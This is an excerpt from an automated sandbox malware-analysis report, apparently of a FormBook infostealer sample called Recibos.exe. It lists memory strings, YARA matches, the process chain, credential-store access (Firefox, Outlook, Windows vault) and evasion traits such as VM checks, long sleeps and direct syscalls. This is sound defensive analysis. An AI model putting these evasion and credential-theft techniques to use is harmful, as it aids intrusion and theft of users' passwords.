            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033-.
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: wlanext.exe, 00000006.00000003.2226856515.0000000007C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wlanext.exe, 00000006.00000003.2247812405.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.2046668076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047021260.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106577645.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047577795.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4108279577.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4105404041.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106632902.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4106506329.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: Recibos.exe, 00000000.00000000.1641180607.0000000000684000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af5daee7-1
            Source: Recibos.exe, 00000000.00000000.1641180607.0000000000684000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e3600b93-2
            Source: Recibos.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a0cacd72-1
            Source: Recibos.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_acf9faef-7
            Source: Recibos.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/11
            Source: C:\Users\user\Desktop\Recibos.exeFile created: C:\Users\user\AppData\Local\Temp\aut5E63.tmpJump to behavior
            Source: Recibos.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wlanext.exe, 00000006.00000003.2229818607.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4105497113.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Recibos.exeReversingLabs: Detection: 66%
            Source: unknownProcess created: C:\Users\user\Desktop\Recibos.exe "C:\Users\user\Desktop\Recibos.exe"
            Source: C:\Users\user\Desktop\Recibos.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Recibos.exe"
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Recibos.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Recibos.exe"Jump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Recibos.exeStatic file information: File size 1219072 > 1048576
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Recibos.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mGAzNmDsKUvf.exe, 00000005.00000000.1965550701.000000000075E000.00000002.00000001.01000000.00000005.sdmp, mGAzNmDsKUvf.exe, 00000007.00000002.4106034961.000000000075E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2047093516.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1942081234.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1943810696.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2047093516.000000000359E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2049269138.0000000003285000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.00000000035CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2047031631.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.0000000003430000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, 00000001.00000002.2047093516.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1942081234.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1943810696.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2047093516.000000000359E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2049269138.0000000003285000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.00000000035CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2047031631.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.0000000003430000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.2014714702.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2015780002.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000002.4106011668.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.2014714702.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2015780002.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000002.4106011668.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Recibos.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Recibos.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Recibos.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Recibos.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Recibos.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Recibos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recibos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Recibos.exeAPI/Special instruction interceptor: Address: E52F6C
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 5769Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 4203Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 2688Thread sleep count: 5769 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 2688Thread sleep time: -11538000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 2688Thread sleep count: 4203 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exe TID: 2688Thread sleep time: -8406000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe TID: 1312Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe TID: 1312Thread sleep time: -43500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe TID: 1312Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe TID: 1312Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
            Source: mGAzNmDsKUvf.exe, 00000007.00000002.4106188861.00000000008DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
            Source: firefox.exe, 00000008.00000002.2364945774.0000026444F2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
            Source: Recibos.exe, 00000000.00000003.1647950781.0000000000F94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
            Source: wlanext.exe, 00000006.00000002.4105497113.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
